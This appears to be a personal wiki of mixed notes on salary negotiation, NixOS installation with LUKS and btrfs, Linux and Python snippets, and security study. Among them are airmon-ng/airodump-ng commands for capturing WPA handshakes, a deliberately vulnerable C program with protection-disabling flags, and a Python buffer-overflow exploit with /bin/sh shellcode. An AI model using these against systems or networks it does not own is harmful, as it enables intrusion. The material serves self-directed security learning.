random

avviki

making my own antora vim wiki plugin thingy

job salary expectations when listed in job posting

when asked these questions:

  1. What are your salary expectations for this role?

    Mention the salary range in the job description. Ask if it’s still the case.

  2. Yes, does that align with your expectations?

    Mention what you want. If you want a higher salary, mention that a higher end aligns with your expectations.

  3. We’d love to offer you a job. Do you accept?

    Don’t answer on the spot. Don’t ask for the pay. Don’t negotiate. First thank them for the job offer, second be grateful to join the team, third ask them for the offer letter in email so that you can review the specifications.

Last thing to do is to be grateful again. Then push for higher end of the salary if it’s not enough.

firejail

if i want to program to use specific folder, do.

firejail --private=~/some_directory ...

life lessons maybe?

Here’s 32 things I’ve learned that I hope help you in your journey:

  1. Nothing worthwhile comes easy.

  2. Work on a passion project, even just 30 minutes a day. It compounds.

  3. Become a lifelong learner (best tip).

  4. Working from 7am to 7pm isn’t productivity. It’s guilt.

  5. To be really successful become useful.

  6. Like houses in need of repair, problems usually don’t fix themselves.

  7. Don’t say something to yourself that you wouldn’t say to someone else.

  8. Try to spend 12 minutes a day in quiet reflection, meditation, or prayer.

  9. Try new things. If it doesn’t work out, stop. At least you tried.

  10. You can’t control everything. Focus on what you can control.

  11. If you think you have it tough, look around.

  12. It’s only over when you say it is.

  13. …​

Source: Reddit

linux maybe

ip a show <interface>

running root on gui in terminal: sudo -E <command> ref: https://wiki.archlinux.org/title/Running_GUI_applications_as_root#Wayland

udev rule

checking if wifi card supports monitor mode: 1. put into monitor mode 2. check if there’s monitor mode 3. test packet injection with aireplay-ng --test <interface>

starting monitor mode: airmon-ng start <interface> checking if monitor mode: iwconfig and find the Mode:Monitor use airodump-ng <interface> to see all the access points

make sure to airmon-ng check kill

for sniffing the network

airodump-ng --bssid <ap_bssid> --essid <ap_name> -c <channel> -w <filename> <interface>

[!NOTE]- This is wrong if your card can’t capture the data, it will only show clear-to-send and request-to-send and no Acknowledgement. a successful sniff must have both Acknowledgement and WPA Handshake in it needs CTS → RTS → Qos Data

targeting a specific network requires specifying the .

or an alternative to that above would be: ifconfig wlan0 down airmon-ng check kill iwconfig wlan0 mode monitor ifconfig wlan0 up iwconfig

wlan.fc.type_subtype in {0x00}

iw

iw dev

show which interface it is related to phy

find if it supports AP

$ iw list
Supported interface modes:
	 * IBSS
	 * managed
	 * **AP**
	 * AP/VLAN
	 * WDS
	 * monitor
	 * mesh point

#python

import sys

args = sys.argv

sys.args will always contain the filename

better use argparse for parameters with arguments

import argparse

parser = argparse.ArgumentParser(description="description here")
parser.add_argument("--name", help="set name")
args = parser.parse_args()

to use flags, add action="store_true" inside the argument. default values can also be set with default="value".

metavar for changing help argument string

Fix windows 10 boot

select the disk with diskpart then select the system volume. if gpt use bcdboot. if mbr, use bootrec. assign a drive letter. bcdboot: bcdboot C:\windows /s V: /f UEFI

Stack Smashing

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main() {
    char u[16];
    volatile int p = 0;
    scanf("%s", u);
    if (p != 0) {
        printf("How u do dat?\n");
    }
    else {
        printf("Nope.\n");
    }
    return 0;
}

compile: gcc vuln.c -o vuln -fno-stack-protector -ggdb

  1. gdb vuln

  2. disas main (not needed)

  3. list 11

  4. break 10

  5. break 11

  6. r <<< $(python -c "print('A'*40)") this should return a segmentation fault note the memory address:

Program received signal SIGSEGV, Segmentation fault.
0x00005555555551a0 in main () at vuln.c:17

  1. confirm with info reg or p/x $rip

remove a breakpoint: del #

  • x/16x buf

  • i f

Run Obsidian in Wayland

OBSIDIAN_USE_WAYLAND=11 obsidan -enable-features=UseOzonePlatform -ozone-platform=wayland

aslr

disabling: setarch $(uname -m) -R <ELF executable> permanently: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

more python stack smashing

import sys

OFFSET      = b"\x41"
EIP         = b"\x38\xcd\xff\xff" # PLEASE FIND THE CORRECT EIP FOR EVERY COMPUTER MEMORY ADDRESS. DO NOT USE THIS ADDRESS SINCE IT'S DIFFERENT FOR ALL COMPUTERS
NOP         = b"\x90"

SHELLCODE   = b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
SHELLCODE2  = b"\x31\xc0\x40\x89\xc3\xcd\x80"

exploit     = SHELLCODE2 + NOP*5 + EIP
sys.stdout.buffer.write(exploit)

updating

nixos-rebuild switch --upgrade

partitioning the drive

  1. Set partition table to GPT

#parted /dev/<device> -- mklabel gpt
parted /dev/vda -- mklabel gpt

  1. Create boot partition

#parted /dev/<device> -- mkpart ESP fat32 1MiB 512MiB
parted /dev/vda -- mkpart ESP fat32 1MiB 512MiB

  1. Set ESP boot flag

#parted /dev/<device> -- set <partition number> <partition label> on
parted /dev/vda -- set 1 ESP on

  1. Create root and home partition

#parted /dev/<device> -- mkpart root <file system> <start> end>
parted /dev/vda -- mkpart root btrfs 512MiB 32.5MiB
parted /dev/vda -- mkpart home btrfs 32.5GiB 100%

simpler version

parted /dev/vda
mklabel gpt
mkpart ESP fat32 1MiB 512MiB
set 1 ESP on
mkpart root btrfs 512MiB 32.5GiB
mkpart home btrfs 32.5GiB 100%

print to verify

formatting with luks encryption

  1. format boot partition (no encryption)

mkfs.fat -F 32 -n boot /dev/vda1

  1. format root and home partitions with luks

#cryptsetup --verify-passphrase -v luksFormat <partition>
cryptsetup --verify-passphrase -v luksFormat /dev/vda2
cryptsetup --verify-passphrase -v luksFormat /dev/vda3

[!NOTE] This does not include a label to the luks container. Use cryptsetup config <luks container> --label <label> to add a label.

  1. mount encrypted partitions

#cryptsetup open <partition> <label>
cryptsetup open /dev/vda2 root_luks
cryptsetup open /dev/vda2 home_luks

  1. partition home and root

#mkfs.btrfs -L <label> <luks dev mapper name>
mkfs.btrfs -L nixos /dev/mapper/root_luks
mkfs.btrfs -L home /dev/mapper/home_luks

i use root and home to have separate partition labels. this causes an issue in booting if labels are the same. the labels here might be used by /dev/disk/by-label/.

  1. mounting root and home partitions

#mount -t <file system> /dev/mapper/<partition> </mnt locations>
mount -t btrfs /dev/mapper/root_luks /mnt
mount -t btrfs /dev/mapper/home_luks /mnt/home

do mkdir /mnt/home if directory does not exist

  1. creating subvolumes

btrfs subvolume create /mnt/root
btrfs subvolume create /mnt/nix
btrfs subvolume create /mnt/persist
btrfs subvolume create /mnt/log
btrfs subvolume snapshot -r /mnt/root /mnt/root-blank

  1. unmount

umount /mnt/home
umount /mnt

  1. mount root and home, and others

mount -o subvol=root,compress=zstd,noatime,ssd,space_cache=v2 /dev/mapper/root_luks /mnt

  1. create directories for mount point

mkdir /mnt/home
mkdir /mnt/nix
mkdir /mnt/persist
mkdir -p /mnt/var/log

  1. mount home and subvolumes

mount -o compress=zstd,relatime,ssd,space_cache=v2 /dev/mapper/home_luks /mnt/home
mount -o subvol=nix,compress=zstd,noatime,ssd,space_cache=v2 /dev/mapper/root_luks /mnt/nix
mount -o subvol=persist,compress=zstd,noatime,ssd,space_cache=v2 /dev/mapper/root_luks /mnt/persist
mount -o subvol=log,compress=zstd,noatime,ssd,space_cache=v2 /dev/mapper/root_luks /mnt/var/log

  1. mount boot

mkdir /mnt/boot
#mount /dev/<partition> /mnt/boot
mount /dev/vda1 /mnt/boot

  1. generate nixos-config

nixos-generate-config --root /mnt

Section 19 of RA 11055

Any person or entity who, without just and sufficient cause, shall refuse to accept, acknowledge and/or recognize the PhilID or PSN, subject to authentication, as the only official identification of the holder/possessor thereof shall be fined in the amount of Five hundred thousand pesos (P500,000.00).

idk

$ cat /proc/mounts
/dev/nvme0n1p2 / btrfs rw,noatime,compress=zstd:3,ssd,discard=async,space_cache=v2,subvolid=265,subvol=/@ 0 0

/dev/nvme1n1p1 /birb btrfs rw,relatime,compress=zstd:3,ssd,discard=async,space_cache=v2,subvolid=5,subvol=/ 0 0

/dev/nvme0n1p3 /home btrfs rw,noatime,compress=zstd:3,ssd,discard=async,space_cache=v2,subvolid=256,subvol=/@home 0 0

/dev/nvme0n1p1 /boot/efi vfat rw,relatime,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro 0 0

  • -fno-stack-protector disables stack smashing protection.

  • -m32 generate 32-bit architecture code.

  • -mpreferred-stack-boundary=2 stack boundary should be aligned in 4 bytes.

  • -ggdb generate debug information compatible with the GDB debugger.

  • -fno-pie disables position-independent executable (PIE) generation which randomizes the base address of the executable.

  • -z execstack sets the stack as executable.

stopping monitor mode 1. ip link set <interface> down 2. iwconfig <interface> mode managed or iw dev <interface> set type managed 3. ip link set <interface> up 4. restart networking services

check iwconfig.

alias memrss 'ps -eo comm,pmem,rss,etime --sort -rss | numfmt --header --from-unit=1024 --to=iec --field 3 | column -t | head -n20'

#hyprland #xdg-desktop-portal screenshare not working - restart xdg-desktop-portal-hyprland

systemctl restart --user xdg-desktop-portal-hyprland.service

python trace memory usage

import tracemalloc
tracemalloc.start()
# some function here or __main__()
print(tracemalloc.get_traced_memory())
tracemalloc.stop()

intersting

#zram using zram-generator use only 50% of max ram /etc/systemd/zram-generator.conf

#ssh when switching ssh keys

eval "$(ssh-agent -s)"
ssh-add <rsa>

example: eval "$(ssh-agent -s)" && ssh-add ~/.ssh/homeserver

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets #airgeddon

checking for Virtual Interface capability:

iw list | grep "Supported interface modes" -A 8

note: run with sudo if not working

should output AP/VLAN (not just AP) for full support of [[Virtual Interface|VIF]]

avoid these chipsets: - rtl8814au - rtl8812au - rtl8821/11au

https://github.com/morrownr/USB-WiFi/issues/314

list wifi devices: nmcli device

#nixos-installation

  1. connect to wifi using wpa_cli

  2. partition the disk with parted (esp, root, home). make sure to use BTRFS

  3. use Full-Disk Encryption

  4. create subvolumes (nix, persist, log)

  5. mount them

  6. malware analysis lab

  7. ids/zeek network monitoring

  8. snort

  9. suricata

  10. metasploitable

  11. wazuh to soar implementation

  12. setup wazuh, at least one agent

  13. integrate shuffle platform with automation

common security frameworks:

  • SOC 2

  • ISO 270012

  • NIST CSF2

  • HIPAA2

  • PCI DSS2

  • HITRUST2

  • COBIT2

  • NIST 800-53

  • NIST 800-171

another random

  • preimage attacks

  • hash collision

security keys for security control - https://pauljerimy.com/security-certification-roadmap/ - https://training.dfirdiva.com/listing-category/it-cybersecurity - https://www.cyberdegrees.org/resources/free-online-courses/#faq

Archiving and compression

tar

Flags

J

Uses xz

z

Uses gzip

v

verbose

c

compress

x

extract

sqlite3

exporting from db to csv

.mode csv
.header on
.output output.csv
SELECT * FROM table;
.quit

papers

APTs

APT1

  • PLA Unit 61398

  • date: 2006 - 2013

  • longest time period access to a network: 1764 days (4 years 10 months)

    • average: 356 days

  • Military Unit Cover Designator (MUCDs)

  • webc2-table malware family

  • headquarter is located in Pudong New Area, Shanghai

  • has at least hundreds to thousands of personnel